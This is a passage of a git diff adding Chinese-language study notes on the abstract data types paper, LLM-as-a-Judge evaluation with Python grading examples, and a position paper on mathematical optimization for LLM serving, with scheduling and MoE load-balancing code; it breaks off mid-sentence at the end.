ADT | API 资源模型、领域实体、protobuf message + service | +| cluster | Java `class`、Rust `struct` + `impl`、Go package + 未导出标识符 | +| `type$op(obj, …)` | `obj.op(…)`、UFCS(Rust)、扩展方法 | +| type parameter | 泛型 `Stack`、TypeScript 泛型 | +| functional abstraction | 无状态的 `fn sort(…)`、工具函数 | +| rep 隐藏 | `private` 字段、Rust 模块隐私、`opaque type` | + +## 学习路径建议 + +1. **先读摘要 + 第 1–2 节**(动机与 ADT 定义),建立「操作刻画类型」直觉 +2. **对照一个你熟悉的语言**:用 Java `interface List` 或 Rust `trait Stack` 手写最小栈,体会「用户看不见 rep」 +3. **读 CLU stack 例子**(上文示例 1 或论文 PDF 全文)——理解 cluster 三段式 +4. 若做分布式系统,再读 Liskov 的 [[vr-1988]] / [[pbft-1999]]——同一位作者,从**数据抽象**走到**复制状态机抽象**,方法论一脉相承 + +## 延伸阅读 + +- 论文 PDF:[Programming with Abstract Data Types](http://jpk.pku.edu.cn/course/sjjg/chapter1/resource/Programming%20with%20Abstract%20Data%20Types.pdf)(Liskov & Zilles, 1974) +- DOI:[10.1145/942572.807045](https://doi.org/10.1145/942572.807045) +- 维基百科:[Abstract data type](https://en.wikipedia.org/wiki/Abstract_data_type) +- CLU 历史:[A History of CLU](https://publications.csail.mit.edu/lcs/pubs/pdf/MIT-LCS-TR-561.pdf)(MIT LCS TR-561) +- 后续机制详解:*Abstraction Mechanisms in CLU*(Liskov, Snyder, Atkinson, Schaffert) +- 结构化编程背景:[[dijkstra-goto-1968]]、Wirth 逐步求精 +- 模块与类型系统后继:[[standard-ml]]、[[hindley-milner]] + +## 一句话总结 + +**Liskov & Zilles 1974 年告诉我们:类型不只是编译器内置的 `int` 和 `array`,而是程序员可以用「操作簇」自行扩展的契约;把表示藏起来、把行为暴露出来,结构化编程才能真正一层层求精而不被实现细节反噬。** diff --git a/src/content/docs/papers/llama.md b/src/content/docs/papers/llama.md index 5094c131f..d08ee7bef 100644 --- a/src/content/docs/papers/llama.md +++ b/src/content/docs/papers/llama.md @@ -149,6 +149,7 @@ LLaMA 论文 14 个作者里有 4-5 人后来离职创办了 Mistral——所以 - [[dpo]] —— DPO — Direct Preference Optimization - [[flan-2021]] —— FLAN — 用自然语言指令教模型学会"听话" - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 - [[gpt-3]] —— GPT-3 — Language Models are Few-Shot Learners - [[llama-vid-2023]] —— LLaMA-VID — 每帧两枚 token,把小时级视频塞进 LLM - [[llava]] —— LLaVA — 开源多模态对话模型 diff --git a/src/content/docs/papers/llm-as-judge.md b/src/content/docs/papers/llm-as-judge.md new file mode 100644 index 000000000..787d8b9c5 --- /dev/null +++ b/src/content/docs/papers/llm-as-judge.md @@ -0,0 +1,247 @@ +--- +title: LLM-as-a-Judge — 用大模型当评测员 +date: 2026-06-13 +分类: 机器学习 +子分类: 模型与算法 +来源: https://arxiv.org/abs/2306.05685 +provenance: pipeline-v3 +--- + +## 日常类比:米其林试吃员,但不是上帝 + +想象两家餐厅要决出「谁更好吃」: + +- **传统做法**:请 100 位食客盲评,统计满意度——贵、慢,但是金标准。 +- **LLM-as-a-Judge**:雇一位**读过海量食评、能按 rubric 打分的资深试吃员**(大模型),对两份「菜品」(模型回答)做 **pairwise** 或 **single** 评分。 + +[Zheng et al., 2023](https://arxiv.org/abs/2306.05685) 系统论证:在 MT-Bench、Chatbot Arena 等场景,强模型作 Judge 与人类偏好的一致性**可达可用水平**,但存在**位置偏见、冗长偏见、自偏好**等系统性缺陷——试吃员会偏先上桌的菜、偏篇幅长的摆盘、偏自己熟悉的菜系。 + +这篇笔记面向零基础读者:弄清 **为什么需要 Judge**、**怎么写 prompt**、**如何与人工/规则指标并用**,并给出可运行的评测片段。 + +--- + +## 问题:开放域回答没有唯一标准答案 + +分类任务的 accuracy 不够用:同一问题常有多种正确表述,人工逐条打分成本随模型迭代指数上升。工业界需要: + +1. **可扩展**: nightly 评 thousands 条 +2. **可解释**: 最好有维度分(有用 / 诚实 / 无害) +3. **可对齐人类**: 与抽检或 Arena 投票相关 + +LLM-as-a-Judge 用**另一个 LLM** 读 `(question, answer[, reference])`,输出分数或 A/B 胜负,充当 **自动标注器** 或 **离线 reward proxy**。 + +--- + +## 核心概念 + +### 1. Single answer grading(单答案打分) + +Judge 对**一个**回答打 Likert 分或 pass/fail。适合有 rubric 的维度分(helpfulness 1–7)。 + +### 2. Pairwise comparison(成对比较) + +同一问题下比较 `answer_A` vs `answer_B`,输出 `A` / `B` / `tie`。Chatbot Arena 的 Elo 即建立在大量 pairwise 上;论文指出 pairwise 往往比绝对分更稳,因为模型更擅长**相对判断**。 + +### 3. Reference-guided vs reference-free + +- **有参考答案**: 对照 gold 评事实性与覆盖度(类似 [[mira-rubric|MIRA]] 的约束项) +- **无参考**: 只凭问题与 rubric(开放对话、创意写作) + +### 4. 评测维度(MT-Bench 常见) + +| 维度 | 含义 | 典型量表 | +|------|------|----------| +| **Helpfulness** | 是否解决问题、信息是否够用 | 1–7 Likert | +| **Honesty / Truthfulness** | 是否胡编、是否承认不知道 | 二元或 1–5 | +| **Harmlessness** | 毒性、偏见、危险建议 | 规则 + 模型 | +| **Instruction following** | 格式、约束、多步是否遵守 | 规则检查 + 模型 | +| **Coherence / Fluency** | 可读性(常与 helpfulness 混评) | 1–5 | + +论文在 **§3.2** 还强调:同一 rubric 下,**pairwise** 与 **single** 的分数分布、与人类的 Spearman 相关并不相同;生产里若混用两种接口,仪表盘上的「胜率」与「均分」不可直接对比。 + +### 5. 已知偏见与缓解 + +| 偏见 | 表现 | 缓解 | +|------|------|------| +| **位置偏见** | 成对比较时更倾向第一个或第二个答案 | 交换 A/B 顺序,各评一次再聚合 | +| **自偏好** | 同系列模型更偏爱自己生成的文风 | 换用不同家族的 Judge;或 blind 去标识 | +| **长度偏见** | 更长答案常被判更好(即使更空) | 长度归一化提示;或截断到相近 token | +| **表面相似** | 与参考答案字面重叠高即高分 | 语义指标 + 人工 spot check | +| **锚定与 rubric 漂移** | 示例分数带偏后续判断 | 固定 few-shot 示例集;定期重标定 | + +Zheng 等报告:在 **MT-Bench** 上,GPT-4 作 Judge 与人类偏好的一致率可达约 **80%** 量级(随题型与子集变化),但仍显著低于理想「可替代人工」线;**Chatbot Arena** 上 Elo 与 Judge 排序的相关性更高,说明**开放式对话**里 pairwise 聚合比单点 Likert 更稳——这与 [[MIRA|MIRA]] 强调「多轮、多约束」评测的设计一致。 + +--- + +## 架构:把 Judge 放进评测流水线 + +```mermaid +flowchart TB + D[Dataset: prompt + candidate answers] + J[LLM Judge + rubric prompt] + A[Aggregate: mean / Elo / pass rate] + H[Human audit sample] + D --> J --> A + A --> H + H -.->|校准 rubric| J +``` + +与 [[opik|Opik]] 一类 LLMOps 工具的关系:Judge 是 **metric 函数**;trace 提供上下文;experiment 对比不同模型/prompt 版本。 + +--- + +## 例子 A:Pairwise Judge(交换顺序消位置偏见) + +```python +import os +from openai import OpenAI + +client = OpenAI(api_key=os.environ["OPENAI_API_KEY"]) + +PAIRWISE_TEMPLATE = """You are a fair judge. Compare two assistants' answers to the user question. +Choose the better one for: helpfulness, correctness, and following instructions. +Reply with exactly one token: A, B, or tie. + +[User Question] +{question} + +[Assistant A] +{answer_a} + +[Assistant B] +{answer_b} +""" + +def pairwise_once(question: str, a: str, b: str) -> str: + msg = PAIRWISE_TEMPLATE.format(question=question, answer_a=a, answer_b=b) + r = client.chat.completions.create( + model="gpt-4o-mini", + messages=[{"role": "user", "content": msg}], + temperature=0, + max_tokens=4, + ) + return (r.choices[0].message.content or "").strip().upper() + +def pairwise_debiased(question: str, a: str, b: str) -> str: + v1 = pairwise_once(question, a, b) + v2 = pairwise_once(question, b, a) # swap positions + # Map swapped result back + flip = {"A": "B", "B": "A", "TIE": "tie"} + v2 = flip.get(v2, v2) + if v1 == v2: + return v1 + if v1 == "TIE" or v2 == "TIE": + return "tie" + return "tie" # disagree -> conservative tie +``` + +生产环境应记录 **Judge 模型版本、prompt hash、temperature**,否则不可复现。 + +--- + +## 例子 B:Single-answer 多维度 rubric(JSON 输出) + +```python +import json + +SINGLE_TEMPLATE = """Score the assistant answer on each dimension 1-7 (7 best). +Return JSON only: {"helpfulness": int, "honesty": int, "instruction_following": int, "brief_reason": str} + +[Question] +{question} + +[Reference answer optional] +{reference} + +[Assistant answer] +{answer} +""" + +def grade_single(question: str, answer: str, reference: str = "") -> dict: + msg = SINGLE_TEMPLATE.format( + question=question, answer=answer, reference=reference or "(none)" + ) + r = client.chat.completions.create( + model="gpt-4o", + messages=[{"role": "user", "content": msg}], + temperature=0, + response_format={"type": "json_object"}, + ) + return json.loads(r.choices[0].message.content) + +# 批量评测 + 简单聚合 +rows = [ + {"q": "Explain CAP theorem in 3 bullets.", "ans": "..."}, +] +scores = [grade_single(r["q"], r["ans"]) for r in rows] +avg_help = sum(s["helpfulness"] for s in scores) / len(scores) +``` + +对 **JSON 约束**类任务,应叠加 **规则检查**(`json.loads` 是否成功、schema 校验),避免 Judge 单独「脑补合规」。 + +--- + +## 例子 C:与 [[opik|Opik]] 的 `evaluate()` 衔接(概念) + +Opik 内置 `AnswerRelevance`、`Hallucination` 等 **LLM metric**,本质仍是 Judge + 固定 rubric。自定义 Judge 可继承 `BaseMetric`: + +```python +# 概念片段 — 以 Opik 文档为准调整 import +from opik.evaluation.metrics import base_metric + +class HelpfulnessJudge(base_metric.BaseMetric): + def __init__(self, name: str = "helpfulness_judge", model: str = "gpt-4o-mini"): + self.name = name + self.model = model + + def score(self, input: str, output: str, **kwargs): + # 调用例子 B 的 grade_single,返回 score + reason + g = grade_single(input, output) + return {"value": g["helpfulness"] / 7.0, "reason": g["brief_reason"]} +``` + +这样 **LLM-as-a-Judge** 与 **实验对比、trace 回溯** 在同一平台闭环。 + +--- + +## 与 RLHF / 红队 / 产品指标的关系 + +- **RLHF / DPO**:Reward model 本质是「学出来的 Judge」;LLM-as-a-Judge 常作 **cheap proxy** 或 **数据标注器**(见 [[ppo|ppo]]、[[dpo|dpo]])。论文 §5 讨论:用 GPT-4 Judge 标 preference 再训 RM,存在 **误差传播**——Judge 的系统偏见会变成策略的「合法目标」。 +- **红队**:Harmlessness 维度可用 Judge 批量筛候选攻击成功率(见 [[chaos-engineering-netflix-2016|混沌工程]] 式「持续加压」思路)。 +- **A/B 与在线指标**:Judge 分数适合 **离线回归**;线上仍以留存、任务完成为准,避免「刷 Judge 分」。 +- **可观测闭环**:[[opik|Opik]]、[[wandb|W&B]] 等把 trace → experiment → metric 串起来时,LLM Judge 宜作为 **一层 scorer**,而非唯一 ground truth(见 [[opik-agent-optimization|Opik Agent Optimization]])。 + +--- + +## 实践清单(从零搭一套 Judge) + +1. **定 rubric**: 每维度写清 1 分与 7 分的行为锚点(可参考 MT-Bench 题型)。 +2. **抽 50–100 条人工金标**: 算 Judge 与人类的 Cohen's κ / Spearman。 +3. **默认 pairwise + 交换顺序**: 排序类任务优先。 +4. **Judge 与考生分离**: 避免同模型自评(除非研究自偏好)。 +5. **分层成本**: 小 Judge 筛 → 大 Judge 裁 → 人工审边界 case。 +6. **版本冻结**: `prompt_v3` + `gpt-4o-2024-08-06` 写入 dataset 元数据。 + +--- + +## 局限与诚实边界 + +- Judge **不是 ground truth**;法律、医疗、合规场景仍需专家签核。 +- **多语言**:英文 Judge 评中文回答常有文化与安全盲区;论文实验以 **英文 MT-Bench / Vicuna** 为主,外推需自建 locale 黄金集。 +- **成本**:GPT-4 级 Judge 全量评百万条仍贵;需分层(小模型筛 + 大模型裁)。 +- **可复现性**:temperature、prompt 版本、模型快照必须写入实验元数据。 +- **对抗性**:模型可学会 **迎合 Judge 文风**(冗长、列表化、道歉套话),与人类「少废话、准答案」偏好背离——这与 [[compositional-incoherence|组合不相干]] 类「指标优化了、行为没对齐」是同一族问题。 + +--- + +## 小结 + +**LLM-as-a-Judge** 把「谁更好」从纯人工搬到可自动化的相对判断与维度打分,是 Chatbot Arena、MT-Bench 及现代 LLMOps 评测的核心技巧。可用前提是:**显式 rubric、偏见缓解、人工校准、与规则指标混用**。把它当成**加速抽检的试吃员**,而不是取代整个食品安全体系。 + +--- + +## 参考资料 + +- 论文 PDF:[arXiv:2306.05685](https://arxiv.org/abs/2306.05685)(v3 修订约 2023-12) +- 项目页与数据:[lmarena.ai](https://lmarena.ai)(Chatbot Arena)、[MT-Bench 评测脚本](https://github.com/lm-sys/FastChat/tree/main/fastchat/llm_judge) +- 相关:[[mira-rubric|MIRA]](多维度 rubric)、[[opik|Opik]](评测流水线)、[[dwork-differential-privacy-2006|差分隐私]](发布评测集时的隐私)、[[noise-explorer-2018|Noise Explorer]](ε 选型思维可类比 Judge 阈值选型) diff --git a/src/content/docs/papers/llm-serving-needs-math.md b/src/content/docs/papers/llm-serving-needs-math.md new file mode 100644 index 000000000..09ac83fde --- /dev/null +++ b/src/content/docs/papers/llm-serving-needs-math.md @@ -0,0 +1,377 @@ +--- +title: LLM Serving Needs Mathematical Optimization, Not Just Heuristics — 零基础学习笔记 +来源: 'Zijie Zhou, "Position: LLM Serving Needs Mathematical Optimization and Algorithmic Foundations, Not Just Heuristics", arXiv:2605.01280, 2026' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:外卖调度,不能照搬「先来先服务」 + +想象你经营一家大型外卖厨房,同时接几百单: + +- 有些订单是「只做前菜」(**prefill**:一次性处理整段输入 prompt,算力密集)。 +- 有些订单要「边做边上菜,每上一道菜还要占一个保温格」(**decode**:逐 token 生成,每步都要读写不断变长的 **KV cache**,更吃内存带宽)。 +- 你事先**不知道**每单最终要做几道菜(**输出长度未知**)。 +- 保温格有限,满了就得踢掉一单,前面做的前菜全白费(**KV 溢出 → 驱逐 → 浪费已算 prefill**)。 + +老派调度员会怎么做?**先来先服务(FIFO)**、**轮询派单(round-robin)**、保温格满了就踢**最久没动过的**(**LRU**)。这些规则在普通 Web 服务器、数据库连接池里用了二十年,简单、好实现。 + +但 LLM 推理有个坑:**每单的「占用空间」会随着上菜进度单调变大**,而且不同阶段的瓶颈完全不同(prefill 像炒菜台,decode 像保温架)。用 Web 时代的经验硬套,在 benchmark 上可能还行,一旦遇到爆款活动、超长对话、MoE 模型里某几个专家被打爆,系统会在**负载边界**突然雪崩——latency 飙升、GPU 空转、成本失控。 + +这篇 **ICML 2026 Position Paper**(Zijie Zhou)的核心主张是:**LLM serving 已经长大,不能再靠「够用就行」的启发式;需要把问题写成数学模型,设计出带可证明保证的算法。** 就像航空业用线性规划推导出「bid price」卖票策略,最终落地成 O(1) 的 accept/reject 规则,三十年带来数十亿美元增量——LLM serving 也需要同样的「建模 → 洞察 → 可部署策略」流水线。 + +--- + +## 是什么 + +这是一篇 **立场论文(position paper)**,不是新系统实现,而是: + +1. **诊断**:vLLM、SGLang 等主流 serving 栈在架构上创新很多(continuous batching、PagedAttention、PD 分离、MoE),但**决策层**仍大量继承经典分布式计算的启发式。 +2. **论证**:LLM 推理有独特的结构(两阶段、KV 动态增长、输出长度未知、continuous batching 耦合),通用启发式**无法系统性利用**这些结构。 +3. **呼吁**:把路由、调度、缓存驱逐、容量规划、MoE 负载均衡等问题**形式化**,引入运筹学 / 在线算法 / 排队论,追求**最坏情况保证、容量下界、工程蓝图**——而不只是 ShareGPT trace 上的平均表现。 + +论文信息: + +| 项目 | 内容 | +|------|------| +| 标题 | LLM Serving Needs Mathematical Optimization and Algorithmic Foundations, Not Just Heuristics | +| 作者 | Zijie Zhou | +| arXiv | [2605.01280](https://arxiv.org/abs/2605.01280) | +| 类型 | ICML 2026 Position Paper | + +--- + +## 为什么重要 + +### 1. 规模已经大到「几个百分点就是天文数字」 + +头部厂商每天服务**数十亿**次推理请求;单次集群成本可达**每天数十万美元**量级。能源消耗以**吉瓦时**计。在这种规模下,调度算法哪怕只提升 5%–10% 吞吐或降低 tail latency,都是巨大的金钱与碳排放节省。 + +### 2. 启发式在「平均 case」和「边界 case」之间断层 + +FIFO、JSQ、LRU 在常见 trace 上看起来「够好」,但生产环境会遇到: + +- 产品发布时的**流量尖峰** +- 多轮 Agent 导致的**超长 decode** +- MoE 里**热点专家**造成的 straggler +- 多模态场景里**高分辨率视频**重复编码 + +启发式缺少**最坏情况保证**:在 adversarial 或漂移 workload 下可能**静默失败**——不是 crash,而是 latency 和成本缓慢恶化,直到运维加机器。 + +### 3. 理论不是「纸上求解器」,而是「揭示好算法的结构」 + +论文反复强调航空 revenue management 的先例:航空公司并不是对每个订票请求在线解 LP,而是用 LP 的对偶变量得到 **bid price**,部署成 O(1) 规则。数学优化的价值在于**分析车辆**,告诉你哪些约束 binding、哪些目标重要——工程师再据此设计轻量启发式,而不是盲目调参。 + +--- + +## 核心概念 + +### 1. Prefill vs Decode:两阶段不对称 + +| 阶段 | 做什么 | 典型瓶颈 | 资源画像 | +|------|--------|----------|----------| +| **Prefill** | 并行处理整个 prompt | 算力(FLOPs) | compute-bound | +| **Decode** | 自回归逐 token 生成 | 读 KV cache | memory-bandwidth-bound | + +同一请求在不同阶段需要**不同的硬件与批处理策略**,这也是 **prefill-decode disaggregation**(Splitwise、DistServe 等)兴起的根源。用单一 FIFO 队列混合两阶段,等于用同一套规则管「炒菜」和「保温」。 + +### 2. KV Cache:动态、单调增长、大小未知 + +每生成一个 token,各层都要追加 K/V 向量。因此: + +- 内存占用 ≈ `prompt_len + 已生成 token 数` +- **到达时不知道**最终占用多少(输出长度未知) +- 超出 GPU 容量 → **驱逐** → 可能浪费已完成的 prefill 计算 + +这把经典「job 大小固定」的调度问题,变成了 **「放进 bin 之后 item 还会长大」的在线 bin packing**——溢出代价极高。 + +### 3. Continuous Batching:请求命运耦合 + +Orca / vLLM 的 continuous batching 允许请求在 decode 过程中**动态进出 batch**。一个 slot 空出来时,调度器要决定**接哪条等待队列里的请求**——这是带 memory constraint 的在线 admission control,而不是简单的 FCFS。 + +### 4. 四层典型决策问题(论文 Section 2 框架) + +```text + ┌─────────────────────────────────────┐ + 请求进入 ────────►│ 2.2 DP 路由:分到哪个 decode worker? │──► sticky assignment + └─────────────────────────────────────┘ + │ + ┌───────────────────▼───────────────────┐ + │ 2.1 MoE EP:token 如何均衡到各 GPU? │──► all-to-all 同步 + └─────────────────────────────────────┘ + │ + ┌───────────────────▼───────────────────┐ + │ 2.3 Worker 内调度 + 容量规划 │──► FCFS / 阈值准入 + └─────────────────────────────────────┘ + │ + ┌───────────────────▼───────────────────┐ + │ 2.4 多模态 embedding 缓存驱逐 │──► LRU + └─────────────────────────────────────┘ +``` + +### 5. 启发式 vs 形式化:对照表 + +| 决策点 | 常见启发式 | 忽略的 LLM 结构 | 形式化方向 | +|--------|------------|-----------------|------------| +| 路由 | round-robin, JSQ, power-of-two | decode 长度未知、KV 线性增长、sticky | 在线整数规划 + 短 horizon 预测 | +| Worker 调度 | FCFS | 输出长度、KV footprint | 最短作业优先 / 阈值准入(WAIT) | +| MoE 均衡 | auxiliary loss, 噪声路由 | 推理时 batch 内即时重分配 | 线性规划(LPLB) | +| 缓存驱逐 | LRU | 对象大小异质、miss 代价差异 | 最小期望代价(LEC) | +| 扩缩容 | 队列深度 / GPU 利用率 | 内存稳定性 vs 计算稳定性 | 排队论闭式稳定条件 | + +### 6. 理论带来的四类收益 + +1. **最坏情况鲁棒性**:competitive ratio,对抗任意 arrival 序列。 +2. **容量规划下界**:部署前算「最少需要多少 GPU 才稳定」。 +3. **算法结构指导工程**:LP 对偶 → 阈值策略;fluid model → 准入规则。 +4. **最优性基线**:知道离理论极限还有多远,避免过度优化。 + +--- + +## 代码示例 1:用 Python 模拟「KV 增长 + FCFS 的隐患」 + +下面是一个**教学级**离散事件模拟,展示为什么 FCFS 在「短请求 + 长请求混合、KV 有限」时 tail latency 会变差。真实 vLLM 复杂得多,但直觉一致。 + +```python +from dataclasses import dataclass, field +from collections import deque +import heapq + +@dataclass(order=True) +class Request: + arrival: float + prompt_tokens: int + output_tokens: int # 真实系统里到达时未知;这里上帝视角用于对比 + started: float = field(default=0.0, compare=False) + finished: float = field(default=0.0, compare=False) + +def kv_units(req: Request, step: int) -> int: + """每 decode 步 KV 占用 ~ prompt + 已生成 token 数""" + return req.prompt_tokens + step + +def simulate(queue_policy: str, requests: list[Request], kv_cap: int, batch_cap: int): + """ + queue_policy: 'fcfs' 或 'sjf'(按 predicted 输出长度优先,近似 shortest-job-first) + """ + now = 0.0 + waiting = deque(sorted(requests, key=lambda r: r.arrival)) + active: list[tuple[int, Request, int]] = [] # (remaining_decode, req, current_step) + done: list[Request] = [] + + while waiting or active: + # 准入:有空 slot 且 KV 够 + while waiting and len(active) < batch_cap: + r = waiting[0] + need = r.prompt_tokens # prefill 后第一步 decode 的 KV + used = sum(kv_units(a[1], a[2]) for a in active) + if used + need > kv_cap: + break + waiting.popleft() + r.started = now + active.append((r.output_tokens, r, 0)) + + if not active: + now = waiting[0].arrival + continue + + # 所有 active 请求推进一步 decode + now += 1.0 + next_active = [] + for rem, r, step in active: + if rem <= 1: + r.finished = now + done.append(r) + else: + next_active.append((rem - 1, r, step + 1)) + active = next_active + + # 排序 waiting(SJF 近似:已知/预测 output 越短越先) + if queue_policy == "sjf" and waiting: + tmp = list(waiting) + waiting = deque(sorted(tmp, key=lambda r: r.output_tokens)) + + return sum(r.finished - r.arrival for r in done) / len(done) + +# 混合 workload:大量短问答 + 少量超长 Agent 任务 +mixed = [] +for i in range(20): + mixed.append(Request(arrival=i * 0.5, prompt_tokens=512, output_tokens=64)) +for i in range(3): + mixed.append(Request(arrival=5 + i, prompt_tokens=4096, output_tokens=2048)) + +avg_fcfs = simulate("fcfs", mixed, kv_cap=120_000, batch_cap=8) +avg_sjf = simulate("sjf", mixed, kv_cap=120_000, batch_cap=8) +print(f"FCFS 平均等待+服务时间: {avg_fcfs:.1f}") +print(f"SJF 平均等待+服务时间: {avg_sjf:.1f}") +# 典型现象:SJF 显著降低平均 latency,因为短请求不被长 Agent 阻塞 +``` + +**读代码时注意**:真实系统里 `output_tokens` 不可知,所以论文才讨论 **带预测误差的调度**(如 adaptive robust scheduling、Nested WAIT)。重点不是「SJF 永远赢」,而是 **FCFS 完全不看 footprint 与剩余工作量,在 memory-constrained batching 下是次优的**——这需要用模型严格表述,而不是凭感觉改队列。 + +--- + +## 代码示例 2:MoE 负载均衡的 LP 骨架(对应 DeepSeek LPLB 思想) + +MoE 推理时,每个 token 被 router 分到 top-k 专家;Expert Parallelism 下专家分布在不同 GPU 上。若 token 分布倾斜,**最慢 GPU 决定整步延迟**(straggler + all-to-all barrier)。 + +DeepSeek **LPLB** 把「沿冗余专家边迁移 token 负载」写成 LP,目标是最小化 max GPU load。下面是最小可运行的 **CPU 版 scipy 骨架**(论文用 GPU 内点法 ~100μs 求解): + +```python +import numpy as np +from scipy.optimize import linprog + +def moe_load_balance_lp(initial_loads: np.ndarray, edges, capacities): + """ + initial_loads[i]: GPU i 上本 batch 初始 token 数 + edges: list of (i, j) 表示可从 GPU i 向 GPU j 迁移负载(冗余专家边) + capacities[(i,j)]: 边 (i,j) 上最多可迁移的 token 数 + 变量: f_ij 迁移量 + L_max + 目标: min L_max + """ + G = len(initial_loads) + n_flow = len(edges) + # 变量顺序: [f_0, ..., f_{E-1}, L_max] + n_var = n_flow + 1 + + # min L_max => c @ x, 最后一个变量系数为 1 + c = np.zeros(n_var) + c[-1] = 1.0 + + # 不等式 A_ub @ x <= b_ub + rows, rhs = [], [] + for g in range(G): + row = np.zeros(n_var) + # load_g - sum_out + sum_in <= L_max => load - sum_out + sum_in - L_max <= 0 + for e_idx, (i, j) in enumerate(edges): + if i == g: + row[e_idx] -= 1.0 + if j == g: + row[e_idx] += 1.0 + row[-1] = -1.0 + rows.append(row) + rhs.append(-initial_loads[g]) + + A_ub = np.array(rows) + b_ub = np.array(rhs) + + # 0 <= f_ij <= cap_ij + bounds = [(0, capacities[e]) for e in edges] + [(None, None)] + + res = linprog(c, A_ub=A_ub, b_ub=b_ub, bounds=bounds, method="highs") + flows = res.x[:-1] + lmax = res.x[-1] + balanced = initial_loads.copy() + for val, (i, j) in zip(flows, edges): + balanced[i] -= val + balanced[j] += val + return lmax, balanced, flows + +# 4 GPU,GPU0 热点 +loads = np.array([120.0, 40.0, 35.0, 38.0]) +edges = [(0, 1), (0, 2), (0, 3)] # 冗余专家副本边 +caps = {(0, 1): 50, (0, 2): 50, (0, 3): 50} + +lmax, balanced, flows = moe_load_balance_lp(loads, edges, caps) +print("优化前 loads:", loads, "max=", loads.max()) +print("优化后 loads:", np.round(balanced, 1), "L_max=", round(lmax, 1)) +print("迁移量 flows:", np.round(flows, 1)) +``` + +**要点**: + +- 目标函数和约束**显式可见**,比「调 auxiliary loss 权重」更可解释。 +- 论文指出 LPLB 当前按 **token 数** 均衡,尚未完全建模 grouped GEMM 的非线性代价——这是「模型要持续 refine」的正常路径。 +- EPLB(静态重排 + 副本选择)是 optimization-**informed** heuristic;LPLB 是 per-batch **直接求解**——两者展示「理论→工程」光谱。 + +--- + +## 论文引用的三条成功路线(深入一点) + +### A. 在线整数规划:DP 路由与 barrier 同步(Chen et al., 2026) + +Data Parallel decode 中,EP all-to-all 前必须等**最慢 worker**。负载 = 各 worker 上活跃请求的 KV 总量,且**每步确定性 +1**(drift)。 + +关键洞察:**不需要预测完整 decode 长度**,只需短 horizon 内「哪些 job 即将结束」。Balance-Future 原则:每步解一个小整数规划,最小化未来 H 步的累计 imbalance。理论保证:相对默认策略,长期平均 imbalance 降低 Ω(√(B log G))——集群越大、batch 越大,收益越显著。 + +### B. Fluid 模型 + WAIT 阈值准入(Ao et al., 2025, arXiv:2504.11320) + +把 continuous batching 建模为**带内生 memory 增长**的多阶段在线调度;用 fluid approximation 刻画稳定区域内 batch 组成与内存占用,再导出 **WAIT**(Waiting for Accumulated Inference Threshold)准入规则。未知输出长度时用 **Nested WAIT** + 安全 buffer,在 Vidur 仿真中相对 baseline **扩大稳定运行区间**、降低近过载区 latency。 + +### C. 排队论稳定条件 + hindsight IP(Anonymous 2025; Jaillet et al., 2025) + +- **稳定性**:系统可能 compute-stable 但 **memory-unstable**(KV 爆掉)——经典 offered load 概念要扩展。 +- **调度下界**:用 clairvoyant integer program 定义「全知最优延迟」,在线算法与之比较 competitive ratio。 +- 预测较准时,**shortest-job-first** 类策略接近最优——但论文强调要 joint design **预测器 + 调度器**,并处理预测 adversarial 错误。 + +### D. 代价感知缓存 LEC(Zhu et al., 2023) + +多模态 serving 里,cache miss 代价差异巨大(重编码 4K 视频 vs 缩略图)。LEC 按 `cost_per_size × access_prob` 驱逐,达到**最优 regret**;实验报告最高 **50×** 成本节省(高低代价操作比大时)。 + +--- + +## 常见反驳与论文回应(Alternative Views 摘要) + +| 反驳 | 论文立场 | +|------|----------| +| 「启发式已经 scale 了」 | scale 不等于 optimal;边界 workload 的隐性成本在百亿请求量级被放大 | +| 「问题变化太快,理论跟不上」 | 结构洞察(barrier、memory drift、unknown size)可跨硬件/架构代际迁移 | +| 「kernel 优化才是大头」 | 算法与系统互补;坏调度会让 fast kernel 空转 | +| 「最坏情况保证太松,没实用价值」 | 保证的价值是** universality**——不依赖某个 benchmark trace;理论提供 scaffold,工程做近似 | + +--- + +## 与主流系统的映射(读源码 / 文档时的 lens) + +| 系统 / 组件 | 启发式痕迹 | 可形式化的钩子 | +|-------------|------------|----------------| +| vLLM scheduler | 默认 FCFS waiting queue | admission 时考虑 predicted len / KV footprint | +| vLLM router | RR, JSQ, power-of-two, prefix-aware | sticky + drift + barrier → online assignment | +| SGLang | 类似路由与 cache 策略 | 结构化 program 的可预测阶段 | +| DeepSeek EPLB/LPLB | 静态 + LP 动态 MoE 均衡 | 已走「建模→求解」路线 | +| 多模态 vLLM prefix cache | LRU 类驱逐 | LEC / cost-aware + 大小异质 | + +读这些项目时,可以自问:**这个 if-else 在优化什么目标?约束是什么?有没有更坏但合法的 workload 会击穿它?** + +--- + +## 未来研究方向(Section 5 提炼) + +1. **预测与调度联合设计**:预测质量随 request type 漂移时,robustness–consistency tradeoff 怎么定? +2. **多目标优化**:TTFT、TPOT、吞吐、能耗、公平性——Pareto 前沿在哪里? +3. **Disaggregation 理论**:何时 PD 分离优于同机?两池资源比例如何随 workload 变? +4. **Agentic 推理调度**:工具调用、分支、暂停、子请求依赖——现有 M/G/1 队列不够用了。 + +--- + +## 零基础自检清单 + +读完后,你应该能回答: + +- [ ] Prefill 和 Decode 为什么不能用同一套「算力导向」调度? +- [ ] 为什么说 KV cache 把调度从「固定大小 job」变成「会长大的 job」? +- [ ] FCFS、RR、LRU 分别对应 serving 里哪三个决策点? +- [ ] 「解 LP」和「用 LP 推导 O(1) 规则」有什么区别? +- [ ] 举一个论文里「形式化方法已在生产/近生产验证」的例子(LPLB / WAIT / LEC 任选一)。 + +--- + +## 延伸阅读 + +| 主题 | 文献 | +|------|------| +| Position 原文 | Zhou, arXiv:2605.01280, 2026 | +| Fluid + WAIT 调度 | Ao et al., arXiv:2504.11320, 2025 | +| KV 约束在线调度 | Jaillet et al., arXiv:2502.07115, 2025 | +| DP 负载均衡 IP | Chen et al., arXiv:2601.17855, 2026 | +| 代价感知缓存 | Zhu et al., NeurIPS 2023 | +| Continuous batching | Yu et al., Orca, OSDI 2022 | +| PagedAttention | Kwon et al., SOSP 2023 | +| MoE LP 负载均衡 | DeepSeek LPLB, 2025 | + +--- + +## 一句话总结 + +**LLM serving 的瓶颈 increasingly 是「决策」而不是「矩阵乘」——而决策层若仍停留在 Web 时代的 